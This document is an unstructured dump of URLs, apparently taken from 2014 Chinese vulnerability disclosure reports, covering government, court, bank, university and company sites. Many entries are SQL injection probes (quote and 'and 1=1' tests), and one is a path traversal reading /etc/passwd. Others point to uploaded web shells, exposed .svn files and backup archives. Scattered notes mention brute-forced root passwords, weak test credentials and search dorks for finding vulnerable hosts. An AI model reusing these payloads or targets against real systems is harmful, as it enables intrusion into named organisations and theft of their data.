http://gxfy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://wsxfy.chinacourt.org/gzdt/more.php?LocationID=0302000000%27 http://fcgzy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://jxwnfy.chinacourt.org/swgk/more.php?LocationID=0302000000%27 http://bjzy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://lhzy.chinacourt.org/dwjs/more.php?LocationID=0302000000%27 http://jgsfy.chinacourt.org/fgfc/more.php?LocationID=0302000000%27 http://ncxhqfy.chinacourt.org/swgk/more.php?LocationID=0302000000%27 http://jxwafy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://lnfy.chinacourt.org/fyxx/more.php?LocationID=0302000000%27 http://yjxfy.chinacourt.org/swgk/more.php?LocationID=0302000000%27 http://ljfy.chinacourt.org/fyxw/more.php?LocationID=0302000000%27 http://xwsfy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://zzzy.chinacourt.org/public/more.php?p=1&LocationID=0302000000%27 http://qhfy.chinacourt.org/sszn/more.php?LocationID=0302000000%27 http://app.tongbu.com/gift/li http://www.xjyh.com.cn/ http://jt.xjyh.com/xjyh2009/Search.jsp http://www.vulns.org/easytalk/?m=index&a=checkreset&urldata=dXNlcl9uYW1lPXRlc3QmbWFpbGFkcmVzPWZlbGl4azN5QHFxLmNvbSZ1c2VyX2lkPTImZGF0ZWxpbmU9MTM5MjYwNDE5NQ== http://djs.dg.gov.cn/pork_data/login/‎ http://djs.dg.gov.cn,莫名的喜感。 http://meeting.ks.gov.cn/; http://meeting.ks.gov.cn/khmeeting/logon.asp http://211.137.133.107/weixin/detailBill/list.do?mobile=13992816622¤tYear=2014¤tMonth=1 https://login.taobao.com/member/login_by_safe.htm?sub=&guf=&c_is_scure=&from=tbTop&type=1&style=default&minipara=&css_style=&tpl_redirect_url=&popid=&callback=jsonp81&is_ignore=&trust_alipay=&full_redirect=&user_num_id=577433811&need_sign=&from_encoding=%810%851_duplite_str=&sign=&ll=&ei=QaIBU-XLLYze0wHy-YGoCw&usg=AFQjCNGXm310YgBJj5KDzLkZzaOAUl2UnQ&bvm=bv.61535280,d.cWc&cad=rjt http://stockdata.stock.hexun.com/2008/accountlist.aspx?app http://weigou.baidu.com/ http://218.9.***.***/city/Login.asp http://www.weimob.com/Webcar/ToolList?pid=* http://www.weimob.com/Webcar/ToolList?pid=* http://member1.taobao.com/member/user_profile.jhtml?user_id=[vul http://ratehis.taobao.com/ http://www.weimob.com/sps/webfood/doLike?aid=-1&outletid=85&v=91793f5a6ca60718716d15b5f3e64785&wechatid=fromUsername http://www.zte-e.com http://www.zte-e.com/cn/member.aspx http://www.zte-e.com/en/member.aspx http://www.zte-e.com/manage/AdminLogin.aspx http://younglight.com.cn/website/company_ldcy.jsp?classid=jtjs http://www.thinksaas.cn/。 http://subject.ourgame.com/2008/hallwin/zhuanzhuan2_lucky/coin_toplist.asp http://subject.ourgame.com/ http://image.baidu.com/channel?c=%E7%BE%8E%E9%A3%9F&t=%E5%85%A8%E9%83%A8&s=0 http://www.thinksaas.cn/。 www.resoft.css.com.cn http://www.dyfdc.gov.cn/bszn.php?type=18 http://www.dyfdc.gov.cn/newslist.php?type=9 http://www.dyfdc.gov.cn/zcfg.php?typeid=1 http://www.dyfdc.gov.cn/zfbzlist.php?type=302 http://www.dyfdc.gov.cn/lpinfo.php?ads_id=192 http://www.dyfdc.gov.cn/zfbz.php?id=1389 http://www.dyfdc.gov.cn/ysz.php?pid=7051 http://wooyun.org/bugs/wooyun-2014-050923 inurl:was40 http://60.166.6.242:8080/was40/,属于www.ahzwgk.gov.cn子服务器 http://60.166.6.242:8080/wasadmin/ http://120.197.96.242:8022/emp/测试 http://120.197.96.242:8022/emp/getphoneword http://www.aili.com.cn/aili.rar http://www.chnsos.com.cn/ http://quan.sohu.com/pinglun/cyqemw6s1/362812738 http://1.wctest.sinaapp.com/souhu/caipiaochangyan.html即可 http://njlsdj.gov.cn/admin_zzb/adminlogin.asp http://icp.now.cn/admin/info.txt http://www.sino-life.com/cms/sinolife/index.shtml inurl:skills/login.do http://www.sdhospital.com.cn:8080/reservation/memberAction.do?code=initUpdate&id=* http://gyjy.juran.com.cn/newslist.aspx?keyword=e http://gyjy.juran.com.cn:80/newslist.aspx?keyword=* http://moviestorm.baofeng.com/baofeng.zip http://gtpt.mengniu.cn:8080/login.action http://www.mofi.cn/index.php?p=3&prdsearch_submit= http://wenwen.soso.com/z/q130668781.htm?ch=wtk.title http://wlpx.tax-edu.net/jsp/common/download.jsp?filepath=/jsp/common/download.jsp http://sobar.soso.com/b/489163 http://sobar.soso.com/t/94200685 http://219.242.65.10/fsweb/MakeIntert.aspx?ID=123 http://220.181.125.164/.svn/entries http://220.181.124.78/.svn/entries http://220.181.125.131:8080/ http://demo1.515158.com/index.php http://demo1.515158.com/index.php http://see.bupt.edu.cn/school/postgraduate/tutor_detail.php?id=1001 http://see.bupt.edu.cn/school/postgraduate/tutor_detail.php?id=1001 http://www.linekong.com/pay/sk_core.php?city=%E5%8C%97%E4%BA%AC http://www.linekong.com/pay/sk.php?city=%E4%B8%8A%E6%B5%B7 http://www.linekong.com/pay/xk_core.php?city=%E4%B8%8A%E6%B5%B7 http://zskd.open.com.cn/web/guestbook_add.aspx http://zskd.open.com.cn/web/guestbook_add.aspx http://125.70.15.72/ http://op.521g.com/login.html ftp://协议时有问题,指针没有判空导致所有进程崩溃。 http://mobile01.yiban.cn/api/pages/v2/action.php?action=commentlist&id=1607817&sid=Ei6LyFJIV0zNNtjhnzISGnj9FI5G/0%20A4lXQNWjIbBxT70XoelvNaTczJa/SgTvUb4LQV0lwW1o=&page=1 http://ny.shangdu.com/www.rar http://flight.mall.ecitic.com/ecitic.zip https://egg.alipay.com/index.php?r=attachment/ViewPicture&id=28449 https://egg.alipay.com googledork:site:gov.cn inurl:ConInfoParticular.jsp?id http://74.125.235.191/#newwindow=1&q=site:gov.cn+inurl:ConInfoParticular.jsp%3Fid http://gk.tjjh.gov.cn/ConInfoParticular.jsp?id=5367 http://gk.tjjh.gov.cn/ConInfoParticular.jsp?id=5367 http://gk.tjjh.gov.cn/ConInfoParticular.jsp?id=5367 http://gk.tjhqqzf.gov.cn/ConInfoParticular.jsp?id=4879 http://info.tjjn.gov.cn/ConInfoParticular.jsp?id=508 http://zfxxgk.bh.gov.cn/ConInfoParticular.jsp?id=1605 http://www.tjnh.gov.cn:7002/ConInfoParticular.jsp?id=2206 http://zwgk.tjhexi.gov.cn:8080/ConInfoParticular.jsp?id=1192 http://gk.tjnk.gov.cn/ConInfoParticular.jsp?id=997 http://xinxigk.baodi.gov.cn/ConInfoParticular.jsp?id=21 http://demo.smartoa.com.cn/ https://10.100.113.11/login.php http://author.xxs8.com/booktaskbox_vip.php?book_id=123 http://www.phpmywind.com/看了下,最新版是4.6.6,更新时间是13/11/28。去年知道创宇曾发布PHPMyWind三个SQL注入补丁→http://bbs.anquan.org/forum.php?mod=viewthread&tid=26575 http://www.e-picclife.com:80/ www.e-picclife.com http://jc.sto.cn/verificationCodeCheck.action http://211.139.67.46/ http://test1.api.renren.com/data?category=app http://test1.api.renren.com/data?category=api http://180.168.117.34:3000/ http://jz.shangdu.com/jz.rar http://112.122.11.135/ http://www.xjmic.com/enterprisemonitor/webpage!indexPage.action http://222.247.51.155:9000/webpage!indexPage.action http://nmgepb.gov.cn:8088/enterprisemonitor/webpage!indexPage.action http://182.148.109.184/enterprise-info!getCompanyInfo.action www.able-elec.com)的卓越课程中心,到底有多少?访问卓越课程中心联盟(http://www.g2s.cn/)可见一斑。 http://cc.bjmu.edu.cn(1310116113:1310116113|1310116114:1310116114|...)| test1:test1(http://cc.bjmu.edu.cn http://cc.xjtu.edu.cn test2:test2 test20:test20 http://cc.sjtu.edu.cn/G2S/MySpace/UserControl/UCRSS1.ashx?OptType=ConfirmRssInfoByID&ID=147843&sname=modified&sfeed=http%3A//jwc.sjtu.edu.cn/rss/rss_notice.aspx%3Fsubjectid%3D198015%26templateid%3D221027 http://oa.damai.cn/login.action https://58.213.29.118/jmx-console/ http://sdnh.citybank365.com/ http://you.ctrip.com/food/hangzhou14/254994.html?RandomCode=2185#comment http://hb.ccb365.com/ http://211.90.241.26/ http://211.90.241.26/main.asp http://bi.m1905.com/wap.login.jsp http://C1.B1.letvcloud.com:20000 http://wooyun.org/bugs/wooyun-2014-050537里,已经获得了10.B20.C77.D140的root密码。 bbs.cntv.cn/amin/.svn/entries bbs.cntv.cn/attachments/.svn/entries https://svn.comsenz.com/cctv/bbs/patchs/20120109/2725&2738/admin https://svn.comsenz.com/cctv http://www.czb.gov.cn/admin/admin!login.action http://beijing.998.com/web.rar http://changzhou.998.com/web.rar http://chongqing.998.com/web.rar http://hangzhou.998.com/web.rar http://shanghai.998.com/web.rar http://www.998.com/web.rar http://www.jdgame.cn/index.php?m=member&c=index&a=account_manage_avatar,通过截断,修改上传的内容,利用压缩文件夹实现绕过 http://ziyuan.iiyi.com)存在存储型XSS漏洞。 http://ziyuan.iiyi.com/source/search/?kw= http://hd.91.com/activity/dsn/upload.php http://hd.91.com/activity/dsn/image/userphoto/88e4ea6b097acc9c089ce9fb90b0c132.php http://hd.91.com/sysadmin06u.php http://med.tcl.com/tcl.rar PS:http://www.wooyun.org/bugs/wooyun-2014-051067/trace/1df1d1fd36fc7e1a4702bff7b6c97c05 www.the9edu.com http://www.supor.com.cn:80/videoList.php?tp=1 http://221.10.182.9:7777/login.asp http://luxury.sohu.com/20140218/n395206851.shtml http://pp.sohu.com/upload/site?callback=jQuery17103956824508495629_1392796395240&desc=送妹子了&url=http://img0.bdstatic.com/img/image/cm29.jpg&get_recent_photos=true&from=sohunews&_=1392797550461 http://demo.chshcms.com/index.php/dance/so/key/%27 http://demo.chshcms.com/index.php/dance/so/key/wooyun http://demo.chshcms.com/index.php/dance/so/key/wooyun%27%20or%20%27%25%27%3D%27 http://edu.qzs.qq.com/qzone/app/blog/v6/swf/MusicPlayer.swf http://www.i-manji.com/products.php?fid=3 inurl:/mbxtwlfwpt/ http://218.26.163.99:9080/mbxtwlfwpt/rygl/bpzyryxkzsq.do?method=goSq&flag=sy)处头像上传处存在XSS,头像信息是经过编码输入与输出的,但是是本地编码解码,可以通过http拦截修改,控制数据。由于本人水平有限不进行跨站演示了,会对系统产生垃圾数据! dword:00000002 IP:192.168.19.45 localPort:49382 http://www.i-manji.com/stores.php?fid=2 http://www.i-manji.com/stores.php?fid=2 url:http://www.lagou.com/subject/sharebonus.html http://www.baby868.com/ http://nb.gfan.com/下ecshop漏洞 report:Array http://211.90.246.57/webagent/files/main.jsp http://www.acer.com.cn http://you.ctrip.com/travels/youyouctripstar10000/1706380.html http://www.ccmids.cn/adminidc http://www.ccmids.cn/1.php http://www.ccmids.cn/2.php http://lp.sto.cn/ http://202.109.255.72/ http://www.zte-d.com/admin/index.php http://www.cs12333.com/ http://61.187.87.130:7080/cs12333net/fwld/fwld_detail.jsp?id=131107001266 http://www.padis-int.org/index.php?c=main&a=view&id=443 http://www.17u.cn/communityhotel.aspx?ChainId=&CityId=1&page=5 http://www.17u.cn/communityhotel.aspx?ChainId=&CityId=1&page=5 http://site.vegaga.com/user/toLogin.action http://v5mall.v5shop.com.cn/productreview.aspx?productid=657 http://go.client.lashou.com:80/index.php/Seven/mylist/cancel_order/STID/groupbuy_4.82_ipad_10000_c9ea79576bf848d860b1a9820e286df4fd483e88_43746679_2419_iPad4,1_7.0.4_43D1A5CC-C1A4-4EAA-A833-E376C5849BAD_c9ea79576bf848d860b1a9820e286df4fd483e88 http://sdk.zuche.com/CARSDK/services/ http://gz.ccb365.com/ParkLifeZaJinDanAward/Default.aspx http://he.ccb365.com/ParkLifeFashAward/FashAward.aspx http://ln.ccb365.com/ParkLifeFashAward/FashAward.aspx http://sunew.ccb365.com/Online/Default.aspx http://hb.ccb365.com/ParkLifeFashAward/OrderList.aspx http://sxw.ccb365.com/Login.aspx http://www.wsdoing.com/AdminMaster/Default.aspx http://www.gansu.gov.cn/jis/objectbox/selx.jsp?tabid=1&limit=1&f_id=userid&f_name=vc_username&date= http://ln-n-tax.gov.cn/jis/objectbox/selx.jsp?tabid=1&limit=1&f_id=userid&f_name=vc_username&date= IP:202.104.120.28 User:root http://60.191.59.12:8000/webroot.rar http://www.huangling.gov.cn/xmgk_view.php?id=546 http://122.13.177.250:8081/index.html http://www.zxxxkj.com/cgal.php http://218.202.7.116:8080/login.do http://shuqian.qq.com/post/ http://you.ctrip.com/events/beijing1/2331028.html http://www.gdmc.edu.cn/view.php?id=11905 http://oa.ctrl.189.cn/web/web.rar http://oa.ctrl.189.cn/web/.svn/entries http://www.e-tiller.com/ch/index.aspx http://www.e-tiller.com/ch/reader/view_cpList.aspx http://uustj.cnjournals.cn/ch/author/login.aspx www.hdt.net.cn存在注入 http://convenient.hdt.net.cn/bmshow.asp?id=104025 http://article.hongxiu.com/diary/mydiarylistzt.asp?countnum=129&go=%c8%b7%b6%a8&page=20&px=&zt= http://www.hp1997.com/passport/ajaxservice.aspx?acion=CheckUnicknme&uid=1 http://www.hp1997.com/passport/ajaxservice.aspx?acion=CheckUnicknme&uid=1 http://kyc.sdpec.edu.cn/kycinfo/../kycinfo/display.php?id=27 http://kyc.sdpec.edu.cn/kycinfo/../kycinfo/display.php?id=27 http://news.gbicom.cn http://yule.sohu.com/upload/join.html http://www.crcf.org.cn/donationol/yanran_guangrong.asp?page=1 http://data.jxjsjy.com/webservice/validIdCard.asmx?wsdl http://office.homeinns.com/ http://guanggao.guoshi.com/videopages/firstclass.php?order=votenum http://www.post183.net/post183/post183new/detailnews.php?id=4115 http://www.post183.net/post183/sannong/detailnews.php?id=160 http://www.post183.net/post183/sannong/more.php?a=tgmenu6&mytype=%C5%A9%D7%CA%D5%B9%CC%A8 http://www.lhtex.com.cn/newshow.asp?bid=2&id=717 http://partner.etms.360buy.com/OrderDeliveryQuery/PS_QuanChengGenZong.aspx http://partner.etms.360buy.com/PartnerIndex.html http://partner.360buy.com/3plhrm/NewHrm/EmployeeAdmin.aspx http://www.qiushibaike.com/users/14288550/follow http://www.n-s.cn/cn/news/class/index.php?author=&catid=0&key=&myord=dtime&myshownums=1 http://www.n-s.cn/phpMyAdmin/index.php暴力破解出root密码为123 http://www.ahly.gov.cn/ http://malx-media-player.software.informer.com/ http://218.206.167.114/wcn/frame http://218.206.168.218/doc/page/main.asp http://office.homeinns.com/hcs/引起的。各种不用ikey就可以登录的弱口令,各种不防暴力破解连个验证码都没有…… http://office.homeinns.com/hcs/Configure/Filesmanage.aspx http://app.abchina.com/mobileSiteSimple/Mobile/FundSearchResult.aspx?currtpn=1&fn=ETF http://www.soufun.com/ask/ask_7039845.html http://www.cnpostair.com/gk.asp?xwClass=%B9%AB%CB%BE%BC%F2%BD%E9 http://www.xftech.com.cn/about.php?typeid=18 http://126.am/SlQop0 http://www.lhtex.com.cn/message.asp http://app2.bjepb.gov.cn/cpout/Attachment/Downloadout.aspx?ispdf=0&ID=1b82b3b2-a1eb-4081-876b-d86e45485848 http://app2.bjepb.gov.cn/cpout/Attachment/Downloadout.aspx?ispdf=0&ID=1b82b3b2-a1eb-4081-876b-d86e45485848'and'a'='a http://app2.bjepb.gov.cn/cpout/Attachment/Downloadout.aspx?ispdf=0&ID=1b82b3b2-a1eb-4081-876b-d86e45485848'and'a'='aa http://app2.bjepb.gov.cn/cpout/out/logon.aspx http://mzj.bjft.gov.cn/cmd.aspx http://data.bd.baofeng.com/admin/gotologin.box http://ball.damai.cn/Sportlist.html?pid=6&cityId=852&areaid=0 http://www.bjwendeng.com/?com=ydy&task=xx&pid=17 http://www.bjwendeng.com/?com=zyk&task=xx&pid=2 http://www.10086.cn/cmccclient/andriod.html cn:8080 http://www.9ask.cn/9ask.cn.rar http://u.fumu.com/ https://acjstb.aliyun.com/flash/JSocket.swf https://acjs.aliyun.com/flash/JSocket.swf http://www.kingqer.com/NewsDetail.aspx?stype=2&id=455 http://ir.anta.com/tc/home.php?option=3&id=4&Itemid=3&year=2007 http://hp1997.com//include/SearchKey.aspx?_=1392972501472&wd=aaaaa http://m1.seeyon.com http://dynamic.app.m.letv.com:80/android/dynamic.php?mod=audit&ctl=audit&act=indexv1&pcode=010510000&version=5.0 www.sdptest.qidian.com www.sdptest.minishua.com www.sdptest.shengpay.com http://www.eqmail.net/kehu.html http://stu.xjtu.edu.cn/ http://www.byecity.com/theme/themhandler.ashx?method=getProductList&ProductIDs=34594&t=0.5517011657357216 http://www.byecity.com/theme/themhandler.ashx?method=getProductList&ProductIDs=34594&t=0.5517011657357216 http://tuan2.zhuna.cn/book/map.php?blat=39.94027964&blng=116.4155094&hotelid=4685 http://tuan2.zhuna.cn/book/map.php?blat=39.94027964&blng=116.4155094&hotelid=4685%20and%201=1 http://tuan2.zhuna.cn/book/map.php?blat=39.94027964&blng=116.4155094&hotelid=4685%20and%201=2 http://pan.baidu.com/s/1i39hKNF http://shop.cnstock.com/gouwulist.aspx?Id=16 http://zhixing.court.gov.cn/ http://506srm.cofco.com/GetPassWord.aspx http://www.cpou.cn/wdsy!getIndex.action site:cpou.cn inurl:admin http://wrs.cpou.cn/ http://kids.damai.cn/KidsAjax.aspx http://appstest.baidu.com/ http://appstest.baidu.com/http/echoheader.php http://buv.me/index.php?do=api&id={projectId http://www.douban.com/thing/749/experience/1060633/ http://www.ctrip.com/member/signupcode.asp http://www.ctrip.com/member/signupcode.asp http://506srm.cofco.com/news/download.aspx?attid=121ebaf0-709e-461a-8e7f-0cf8ebe7372b&nid=2611 www.gzekt.com/YoukeAction_judgeBusiness.action http://123.139.154.175/admini/ http://zzmetro.cn/date.tgz http://zzmetro.cn/sysinfo.jsp,无任何访问控制,暴露很多系统信息 http://www.dl-hr.com/Silic.jsp http://www.cnpostair.com/dt.asp?xwclass=&page_no=1 http://www.cnpostair.com/dt.asp?xwclass=%EF%BF%BD%EF%BF%BD%D2%B5%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://www.cnpostair.com/gl.asp?xwClass=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%CF%A2 http://www.cnpostair.com/yw.asp?xwClass=%D2%B5%EF%BF%BD%EF%BF%BD%CE%A7 http://www.cnpostair.com/show_news1.asp https://openhome.alipay.com/doc/viewApiDoc.htm?name=alipay.micropay.order.freezepayurl.get&version=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\%252Fetc%252Fpasswd%2500&subVersion=1.0&packageCode=MICROPAY http://218.206.193.38/login.jsp http://www.yishion.com/media_in.php?id=15 http://m.114piaowu.com/usercenter/passwordInfo/ http://srm.lzlj.com.cn/app/pages/index.action http://www.shanghaimuseum.net/education/show/show-list?dateSelector=2014-03-01&keyword=%E6%B4%BB%E5%8A%A8%E6%90%9C%E7%B4%A2&seriesId=&pageNo=1 http://218.202.106.85/fee/fee.jsp http://www.hicourt.gov.cn/theory/artilce_list.asp?id=8025 http://mad.m.maxthon.cn/promotion/query.php?source_type=phone&channelid=610024630100&version_code=2866&country=CN&language=zh&dvc_id=5284047f4ffb4e04824a2fd1d1f0cd6275f80000&uid=&vname=4.1.8.2000 http://www.krd.csdb.cn/sjk.aspx?ID=1 http://www.krd.csdb.cn/iteminfo.aspx?Bh=5 http://www.krd.csdb.cn/newslist.aspx?Type=sjfw http://www.krd.csdb.cn/datalist.aspx?ID=269 http://www.krd.csdb.cn/datalist.aspx?db_ID=1 http://www.krd.csdb.cn/SysAdmin/login.aspx http://www.krd.csdb.cn/11.aspx http://www.krd.csdb.cn/1.aspx http://www.krd.csdb.cn/cmd.aspx http://genome.csdb.cn/cgi-bin/hgNear?org=human http://genome.csdb.cn/cgi-bin/hgTracks?org=human http://genome.csdb.cn/cgi-bin/hgVisiGene?org=human http://genome.csdb.cn/cgi-bin/hgBlat?org=human http://genome.csdb.cn/cgi-bin/hgGenome?org=human http://hp1997.com/include/SearchKey.aspx?wd=0zUhCt7R&_=1393137456995 http://www.micro.csdb.cn/newdb/search.php?db=xmtm&number=1 http://www.micro.csdb.cn/phpmyadmin/index.php http://wooyun.org/bugs/wooyun-2014-049391 http://paycenter.dooland.com/make_order.php?merc_no=M10001&merc_tranid=14022312213310958443&amt=1000&itemname=%E8%AF%BB%E8%A7%88%E5%A4%A9%E4%B8%8B%E5%85%85%E5%80%BC&itemdes=¬ify_url=http%3A%2F%2Fwww.dooland.com%2Fmagazine%2Fdoolandpay%2Fdoolandpay_notify.php%3Freturn_type%3D1%26orderid%3D14022312213310958443%26order_type%3D6&return_url=http%3A%2F%2Fwww.dooland.com%2Fmagazine%2Fdoolandpay%2Fdoolandpay_notify.php%3Freturn_type%3D0%26orderid%3D14022312213310958443%26order_type%3D6&merc_remark=useyu%3D0%26yuamt%3D0%26userid%3D10958443&sign=7794526d3a7ee97469640ff80dc2978d http://www.wechatpen.com/wxb/vipcard/ChangeVip.aspx?id=15 http://www.wechatpen.com/api/app/card/UserInfo.aspx?sn=65e2c4b473b28c40397f7afc5ec2d07f&wid=332389&acid=10924&wxref=mp.weixin.qq.com&id=30517 http://maud.nau.edu.cn/admin/ http://zx.nau.edu.cn/news_view.asp?id=153 http://wap.yikuaiqu.com/weather.php?cityid=101280701&zone_id=13185 http://wap.yikuaiqu.com/product_list.php?theme_zone=7858 wap.yikuaiqu.com/photo.php?id=23333 http://61.190.8.240:6988/jcapp/login.do?method=begin http://61.190.8.240:6988 http://61.190.8.240:6988/admin/login.jsp http://web.7k7k.com http://web.7k7k.com/kefu/upload.php http://web.7k7k.com/uploads/user/201402/b7f99a1596a40732422bb5325a2980bd.pHp http://www.wechatpen.com/api/app/website/list.aspx?wid=332389&acid=10379&menu_id=145128,正常 http://www.wechatpen.com/api/app/website/detail.aspx?sn=&wid=332389&acid=%22&menu_id=145128&wxref=mp.weixin.qq.com,有惊喜 http://link.weather.com.cn/admin/index.php https://aq.qq.com/cn2/findpsw/pc/pc_find_pwd_input_account,输入QQ号码,再通过手机短信找回QQ登录密码 www.tenpay.com,快速登录到财付通 http://888.qq.com/promote/party/2013/1225_luck8/index.shtml http://888.qq.com/party/party_2013/flight_chess/flight_chess_send_tips.php?sendIds=1*****13 about:blank about:blank,只在标题栏上显示地址,加载完之后再替换 http://yhyc8.coolcamp.xdf.cn/ http://yhyc8.coolcamp.xdf.cn/log/2011.php encap:Ethernet B9:C1:62:CE b9ff:fec1:62ce/64 Scope:Link MTU:1500 packets:20406011513 dropped:5243688 packets:25380604005 http://128.B66.C131.D169:8090 http://www.ujipin.com/hello.php http://www.ujipin.com/images/shell.php http://www.ujipin.com/gift/zhucesongli/ http://www.rushncash.com.cn/huodong.php?pid=99999999 http://wap.dooland.com/index.php http://wap.dooland.com/index.php?verify=dGVzdGVyMTIzLTk2ZTc5MjE4OTY1ZWI3MmM5MmE1NDlkZDVhMzMwMTEy http://wap.dooland.com/b.php http://wap.dooland.com/b.php?id=9112&verify=dGVzdGVyMTIzLTk2ZTc5MjE4OTY1ZWI3MmM5MmE1NDlkZDVhMzMwMTEy http://support1.lenovo.com.cn/lenovo/wsi/station/servicestation/default.aspx?intcmp=GW http://support1.lenovo.com.cn/lenovo/wsi/station/servicestation/Api/SendSMS.ashx?num=手机号码&mess=短信内容&code=6559(此处验证码发送一次以后不会改变,所以可以一直使用) http://wap.dooland.com/login.php http://119.57.18.229/ http://wap.wissun.com/news-more.php?id=26 http://golf.cctv.com/e/extend/court/court_detail.php?courtid=23&hole=4 http://saf.hotpotpro.com/SAF/ http://wooyun.org/bugs/wooyun-2014-051919 http://www.hnldj.gov.cn/ http://www.hngwyj.gov.cn/ http://www.ccccah.cn/ http://www.yiyi-group.com/ http://www.xjjwhg.com/ http://www.hnldj.gov.cn/new/zwgk.php?class_id=115 http://www.hnldj.gov.cn/new/ztzl.php?class_id=3396 http://www.hnldj.gov.cn/new/News_Text.php?id=3709&class_id=168 http://www.hnldj.gov.cn/new/ztzl_Text.php?class_id=3396&id=801 http://www.hnldj.gov.cn/red/ztzl.php?class_id=3396 http://www.hnldj.gov.cn/red/gdzl.php?style=3&lanmu=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EB%A1%A2%CA%A1%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://www.hnldj.gov.cn/red/nmg.php?class_id=74 http://www.hnldj.gov.cn/red/zcgl.php?class_id=70 http://www.hnldj.gov.cn/red/ldjc.php?class_id=66 http://www.hnldj.gov.cn/red/zynl.php?class_id=62 http://www.hnldj.gov.cn/red/rlzy.php?class_id=34 http://www.hnldj.gov.cn/red/bszn.php?class_id=46 http://www.hnldj.gov.cn/red/jyzd.php?class_id=42 http://www.hnldj.gov.cn/red/zwgk.php?class_id=10 http://www.hnldj.gov.cn/red/shbx.php?class_id=38 http://www.hnldj.gov.cn/red/ztzl_text.php?id=799&class_id=3396 http://www.hngwyj.gov.cn/downfileclassify.php?classify=1 http://www.hngwyj.gov.cn/arccotent.php?id=1245 http://www.ccccah.cn/News_Text.php?id=95&class_id=112 http://www.ccccah.cn/gcyj.php?class_id=9 http://www.ccccah.cn/News_Text.php?class_id=13&id=699 http://www.yiyi-group.com/popbase.php?base_id=3356&id=18 http://www.yiyi-group.com/member_popbase.php?base_id=3245&id=43 http://www.yiyi-group.com/rlzy_popbase.php?id=47 http://www.yiyi-group.com/xmhz_popbase.php?base_id=3349&id=30 http://www.xjjwhg.com/model3.php?news_id=292 http://www.xjjwhg.com/model2.php?category_id=2&category_value=10 http://english.forestry.gov.cn http://www.dam.com.cn/ http://fzb.serc.gov.cn http://www.12320.gov.cn/ http://sxxz.gov.cn/ http://www.ccat.net.cn/ http://www.hbinvest.gov.cn/ http://www.yjzjj.gov.cn/ http://www.tcrc.com.cn/ http://bztg.ahbz.gov.cn/ http://www.ytstc.gov.cn/ http://www.gzgtzy.gov.cn/ http://english.forestry.gov.cn/web/article.do?action=search http://english.forestry.gov.cn/web/article.do?action=pic&id=200911230845201784&type=1 http://english.forestry.gov.cn/web/article.do?action=readnew&id=201401210426516440 http://www.dam.com.cn/news/view.jsp?id=6405 http://www.dam.com.cn/news/list.jsp?bt=88952634&lb=88952634 http://www.dam.com.cn/travel/view.jsp?id=43 http://www.dam.com.cn/damView/view.jsp?id=1084 http://fzb.serc.gov.cn/about.aspx?id=09187559-3061-4e1b-bd3c-24e23de714c5 http://fzb.serc.gov.cn/gg_view.aspx?id= http://fzb.serc.gov.cn/news_view.aspx?id=a7026f37-d515-419a-9a33-4fde79b1c921 http://fzb.serc.gov.cn/zcfg_view.aspx?id=4b88f36d-c030-4812-a496-93d04a529fdd http://fzb.serc.gov.cn/wjgg_view.aspx?id=fa92d166-16e2-4615-bd64-1f84b1c971c3 http://fzb.serc.gov.cn/jgyj_view.aspx?id=bd2bb099-4fbe-4500-9e0d-0f16d207d0f0 http://fzb.serc.gov.cn/zt.aspx?id=ccd743a9-e985-4e43-a068-0fc9dcf263d5 http://fzb.serc.gov.cn/index.aspx http://fzb.serc.gov.cn/about.aspx?cid=fbf030da-151a-4095-a01a-e16f103c29d5 http://fzb.serc.gov.cn/jgyj.aspx?id=1061b74d-3287-4631-ba7b-36612ebd55aa http://fzb.serc.gov.cn/zcfg.aspx?id=6fdfd724-9ec3-4a34-8466-2bf3e43b466e http://fzb.serc.gov.cn/xzxk_view.aspx?id=d9b314fb-792b-4ba3-a19f-9f6ec32a32b3 http://fzb.serc.gov.cn/xzxk_list.aspx?id=b6c4a001-9a5b-437e-b297-0536fc9e96a6 http://fzb.serc.gov.cn/xzxk_list.aspx?cid=7eb0722b-f520-440a-a1c4-3ef8a240498b&id=9c0d9c3c-8939-4563-9b34-fd2266e35f2c http://fzb.serc.gov.cn/xzxk_list.aspx?cid=7eb0722b-f520-440a-a1c4-3ef8a240498b&id=9c0d9c3c-8939-4563-9b34-fd2266e35f2c http://fzb.serc.gov.cn/news.aspx?cid=c911328d-38d2-4562-b9c5-2f8882ddb2c0 http://fzb.serc.gov.cn/qzlx_view.aspx?id=7873b8cb-3a1a-4dbd-96f1-4907a317b350 http://fzb.serc.gov.cn/zt.aspx?sid=4b5386d2-1c63-47ac-b6b1-295e45e4cd43 http://www.12320.gov.cn/usoso/websiteTJ.jsp?id= http://www.sxxz.gov.cn/templet/show_xz.php?id=209 http://sxxz.gov.cn/templet/show_xz.php?id=174 http://www.sxxz.gov.cn/templet/lhzt/2012/display.php?id=16706 http://sxxz.gov.cn/templet/list_xz.php?page=1&pagesize=20 http://www.sxxz.gov.cn/vote/toupiaocount.php?id=9 http://www.ccat.net.cn/info/index.asp?strParentCode=news http://www.ccat.net.cn/certification/buddy_detail.asp?intID=1124 http://www.ccat.net.cn/info/detail.asp?strParentCode=news&strInfoTypeCode=news_87&intInfoID=1358 http://www.ccat.net.cn/organization/index2.asp?intOrgID=1 http://www.ccat.net.cn/corporation/list.asp?strInfoTypeCode=corporation_policy http://www.ccat.net.cn/corporation/detail.asp?strInfoTypeCode=corporation_policy&intID=1287 http://www.ccat.net.cn/info/list.asp?strParentCode=curriculum&strInfoTypeCode=curriculum_507 http://www.ccat.net.cn/corporation/detail.asp?strInfoTypeCode=corporation_policy&intID=1287 http://www.ccat.net.cn/info/list.asp?strParentCode=curriculum&strInfoTypeCode=curriculum_507 http://www.ccat.net.cn/organization/get_org_index_url.asp?strOrgName= http://www.ccat.net.cn/organization/intro.asp?intOrgID=1 http://www.ccat.net.cn/organization/list.asp?intOrgID=1&strCode=org_list2_1 http://www.ccat.net.cn/organization/featuredlinks.asp?intOrgID=1 http://www.ccat.net.cn/organization/detail.asp?intOrgID=1&strCode=org_news_1&intID=1038 http://www.ccat.net.cn/zscx/zscx.asp 